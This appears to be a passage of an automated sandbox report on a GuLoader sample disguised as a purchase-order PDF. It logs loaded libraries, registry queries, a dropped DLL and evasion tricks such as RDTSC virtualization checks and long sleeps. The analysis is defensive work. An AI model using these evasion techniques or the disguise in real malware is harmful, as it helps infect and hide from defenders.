Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Benchership141.lnk.0.dr

LNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2006375263.0000000005405000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2918352521.0000000003F75000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_10002DE0 push eax; ret		0_2_10002E0E
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_3_001949CC push eax; iretd		4_3_001949CD

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	API/Special instruction interceptor: Address: 542B18C
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	API/Special instruction interceptor: Address: 3F9B18C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	RDTSC instruction interceptor: First address: 53EA910 second address: 53EA910 instructions: 0x00000000 rdtsc 0x00000002 cmp al, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDAB0B68C44h 0x00000008 test ah, dh 0x0000000a cmp bl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	RDTSC instruction interceptor: First address: 3F5A910 second address: 3F5A910 instructions: 0x00000000 rdtsc 0x00000002 cmp al, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDAB0D34E94h 0x00000008 test ah, dh 0x0000000a cmp bl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Memory allocated: 35CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Memory allocated: 37CD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599426	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598493	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595372	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594219	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Window / User API: threadDelayed 1500			Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Window / User API: threadDelayed 8331			Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7876	Thread sleep count: 1500 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7876	Thread sleep count: 8331 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599426s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598610s >= -30000s	Jump to behavior
